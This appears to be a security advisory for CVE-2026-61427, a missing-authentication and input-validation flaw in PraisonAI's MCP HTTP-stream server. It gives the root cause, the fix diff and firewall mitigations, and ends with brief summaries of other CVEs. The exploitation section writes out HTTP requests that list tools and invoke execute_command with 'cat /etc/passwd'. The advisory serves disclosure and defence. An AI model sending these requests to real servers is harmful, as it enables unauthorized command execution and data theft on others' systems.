Oct 8, 2026·4 min read·4 visits
Unauthenticated remote attackers can query and invoke administrative tools on PraisonAI MCP servers due to missing default authentication and input validation.
CVE-2026-61427 is a critical authentication bypass and improper input validation vulnerability within the Model Context Protocol (MCP) HTTP-stream server of PraisonAI. In versions prior to 4.6.78, the server lacks authentication by default and forwards client messages directly to Python tool handlers without input validation. When bound to non-localhost interfaces, this permits unauthenticated remote attackers to perform unauthorized administrative operations and execute tools.
The Model Context Protocol (MCP) is an architectural standard designed to connect Large Language Models (LLMs) securely to external data repositories and execution tools. PraisonAI implements this protocol using a Server-Sent Events (SSE) server to manage downstream traffic and standard HTTP POST endpoints for receiving client requests.
Prior to version 4.6.78, the PraisonAI MCP HTTP-stream integration exposed critical interfaces without authentication by default. If an administrator failed to specify an API key, the authorization block was omitted from execution entirely. This design decision exposed a broad attack surface, allowing anyone with access to the server port to interact with underlying tools.
This flaw becomes highly critical when operators bind the MCP server to non-loopback network interfaces, such as 0.0.0.0. This configuration enables unauthenticated remote clients to fully enumerate capabilities and trigger python execution routines.
The primary root cause lies within src/praisonai/praisonai/mcp_server/transports/http_stream.py. Inside the endpoint logic, authentication is conditionally validated based on the existence of a configured API key. If the command-line execution parameter --api-key is not supplied, self.api_key defaults to None, bypassing the authorization check.
# Conditional check allowing execution without authorization headers
if self.api_key is not None:
auth_header = request.headers.get("Authorization")
if not auth_header or not auth_header.startswith("Bearer "):
return HTTP_401_UNAUTHORIZEDA secondary root cause is improper input validation during parameter parsing. The MCP message dispatcher accepts arguments for tools/call requests and passes them directly into Python tool handlers. The dispatcher completely skips schema matching (inputSchema), rendering structural parameters unvalidated.
To remediate the vulnerability, the initialization sequence of the HttpStreamTransport class was modified in commit 393de394087e3badc79acfec490323bcc99638bd. Developers introduced a strict verification check that halts execution if the server is exposed externally without an active API key configuration.
diff --git a/src/praisonai/praisonai/mcp_server/transports/http_stream.py b/src/praisonai/praisonai/mcp_server/transports/http_stream.py
--- a/src/praisonai/praisonai/mcp_server/transports/http_stream.py
+++ b/src/praisonai/praisonai/mcp_server/transports/http_stream.py
@@ -109,6 +109,11 @@ def __init__(
else:
self.allowed_origins = allowed_origins
+
+ # Verify that an api_key is configured when binding externally
+ if host not in ("127.0.0.1", "localhost", "::1") and not self.api_key:
+ raise ValueError(
+ "api_key is required when MCP HTTP-stream binds to a non-localhost address"
+ )While this fix prevents network-level exploitation of default configurations, it does not mandate authentication for servers bound to localhost (127.0.0.1). If a local attacker, or a remote adversary leveraging Cross-Origin Resource Sharing (CORS) bypasses, interacts with the local port, unauthenticated tool execution remains possible.
Exploiting this flaw requires three sequential protocol steps: establishing an SSE stream, retrieving the schema structure of target tools, and dispatching a payload containing the execution request.
First, the attacker opens a persistent downstream channel to receive event notifications:
GET /sse HTTP/1.1
Host: target-ip:8000
Accept: text/event-streamAfter retrieving a valid session identifier, the attacker lists available capabilities using the tools/list JSON-RPC method. This request is completed without any authorization parameters:
POST /message?session_id=attacker-session-123 HTTP/1.1
Host: target-ip:8000
Content-Type: application/json
{
"jsonrpc": "2.0",
"method": "tools/list",
"id": 1
}Finally, the attacker invokes an administrative tool (such as local command execution utilities) by targeting tools/call. Because parameter schemas are not validated, arbitrary command arguments are executed directly by the runtime environment:
POST /message?session_id=attacker-session-123 HTTP/1.1
Host: target-ip:8000
Content-Type: application/json
{
"jsonrpc": "2.0",
"method": "tools/call",
"params": {
"name": "execute_command",
"arguments": {
"command": "cat /etc/passwd"
}
},
"id": 2
}System administrators must immediately upgrade PraisonAI to version 4.6.78 or later to restrict unauthenticated external bindings. Deployments using older versions must configure an API key on the command line interface.
pip install --upgrade praisonaiIf upgrading is delayed, configure firewall filtering rules to restrict port 8000 (or the configured MCP port) strictly to loopback interfaces. This prevents external hosts from accessing endpoints directly:
iptables -A INPUT -p tcp -s 127.0.0.1 --dport 8000 -j ACCEPT
iptables -A INPUT -p tcp --dport 8000 -j DROPAdditionally, always launch services with explicit, randomly generated API keys rather than relying on default framework configurations:
praisonai mcp serve --transport http-stream --api-key "$(openssl rand -hex 32)" --host 0.0.0.0CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L| Product | Affected Versions | Fixed Version |
|---|---|---|
PraisonAI MervinPraison | < 4.6.78 | 4.6.78 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-306 (Missing Authentication), CWE-20 (Improper Input Validation) |
| Attack Vector | Network |
| CVSS v3.1 | 7.3 (High) |
| EPSS Score | 0.00389 (~0.39% probability) |
| Exploit Status | Proof of Concept (PoC) |
| CISA KEV Status | Not Listed |
The product does not perform authentication for functionality that requires a provable user identity, and fails to validate inputs.
CVE-2026-107387 is a high-impact uncontrolled memory allocation vulnerability in music-metadata, a widely used Node.js metadata parser. The flaw occurs in the APEv2 tag parser, where the library reads an attacker-controlled 32-bit integer indicating the tag size and immediately requests a corresponding heap buffer reservation. Because this allocation occurs before validating if the input stream actually contains those bytes, an attacker can supply a minuscule audio file to trigger large, disproportionate allocations, resulting in heap exhaustion and an uncatchable process-wide Out of Memory (OOM) crash.
An input validation vulnerability exists in music-metadata versions prior to 11.16.0, where parsing a crafted MP4 file containing a sample-description (stsd) box with a zero-value size entry causes a synchronous infinite loop and memory exhaustion, resulting in complete Denial of Service.
A path traversal vulnerability in datamodel-code-generator allows remote attackers to write or overwrite arbitrary files on the local host filesystem via a manipulated Protobuf schema containing malicious weak import paths.
PraisonAI is vulnerable to an arbitrary local file read vulnerability prior to version 4.6.78. The flaw is in the ContextGatherer component, where validation checks are executed only after files are parsed and appended to the context bundle, bypassing security constraints.
An algorithmic complexity vulnerability (CWE-770) in the Excelize library allows remote attackers to cause resource exhaustion (100% CPU usage) via a crafted Microsoft Excel spreadsheet. This occurs because the look-ahead row index parsing in Rows.Columns() fails to enforce upper boundary limits, enabling an out-of-bounds row index to trigger an infinite seek loop inside the Rows iterator.
An unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in Ghost CMS from version 6.54.1 to 6.65.0. The vulnerability stems from a validation bypass in the favicon resolution logic within the bookmark-fetching subsystem, which allows remote, unauthenticated attackers to trigger arbitrary HTTP requests to the local host and internal networks. This bypass circumvents the custom DNS-level IP blocklist controls configured globally in the application.